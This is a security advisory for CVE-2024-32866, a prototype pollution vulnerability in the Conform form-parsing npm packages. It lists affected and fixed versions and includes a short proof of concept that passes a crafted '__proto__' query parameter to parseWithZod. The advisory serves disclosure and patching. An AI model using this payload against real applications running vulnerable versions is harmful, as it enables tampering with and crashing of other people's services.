GHSA-624g-8qjg-8qxf

Source

https://github.com/advisories/GHSA-624g-8qjg-8qxf

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-624g-8qjg-8qxf/GHSA-624g-8qjg-8qxf.json

JSON Data

https://api.test.osv.dev/v1/vulns/GHSA-624g-8qjg-8qxf

Aliases

CVE-2024-32866

Related

CVE-2024-32866

Published

2024-04-23T21:15:55Z

Modified

2024-06-10T20:12:58Z

Severity

8.6 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H CVSS Calculator

Summary

Conform contains a Prototype Pollution Vulnerability in `parseWith...` function

Details

Summary

Conform allows the parsing of nested objects in the form of object.property. Due to an improper implementation of this feature, an attacker can exploit it to trigger prototype pollution by passing a crafted input to parseWith... functions.

PoC

const { parseWithZod } = require('@conform-to/zod');
const { z } = require("zod"); 

const param = new URLSearchParams("__proto__.pollution=polluted");
const schema = z.object({ "a": z.string() });

parseWithZod(param, { schema });
console.log("pollution:", ({}).pollution); // should print "polluted"

Details

The invocation of the parseWithZod function in the above PoC triggers the setValue function through getSubmissionContext and parse, executing the following process, resulting in prototype pollution:

let pointer = value;

pointer.__proto__ = pointer.__proto__;
pointer = pointer.__proto__;

pointer.polluted = "polluted";

This is caused by the lack of object existence checking on line 117 in formdata.ts, where the code only checks for the presence of pointer[key] without proper validation.

Impact

Applications that use conform for server-side validation of form data or URL parameters are affected by this vulnerability.

Database specific

{
    "nvd_published_at": "2024-04-23T21:15:48Z",
    "cwe_ids": [
        "CWE-1321"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2024-04-23T21:15:55Z"
}

References

Affected packages

npm / @conform-to/dom

Package

Name: @conform-to/dom; View open source insights on deps.dev
Purl: pkg:npm/%40conform-to/dom

Affected ranges

Type: SEMVER
Events: Introduced

1.0.0

Fixed

1.1.1

Database specific

{
    "last_known_affected_version_range": "<= 1.1.0"
}

npm / @conform-to/zod

Package

Name: @conform-to/zod; View open source insights on deps.dev
Purl: pkg:npm/%40conform-to/zod

Affected ranges

Type: SEMVER
Events: Introduced

1.0.0

Fixed

1.1.1

Database specific

{
    "last_known_affected_version_range": "<= 1.1.0"
}

npm / @conform-to/yup

Package

Name: @conform-to/yup; View open source insights on deps.dev
Purl: pkg:npm/%40conform-to/yup

Affected ranges

Type: SEMVER
Events: Introduced

1.0.0

Fixed

1.1.1

Database specific

{
    "last_known_affected_version_range": "<= 1.1.0"
}

npm / @conform-to/zod

Package

Name: @conform-to/zod; View open source insights on deps.dev
Purl: pkg:npm/%40conform-to/zod

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

0.9.2

npm / @conform-to/yup

Package

Name: @conform-to/yup; View open source insights on deps.dev
Purl: pkg:npm/%40conform-to/yup

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

0.9.2

npm / @conform-to/dom

Package

Name: @conform-to/dom; View open source insights on deps.dev
Purl: pkg:npm/%40conform-to/dom

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

0.9.2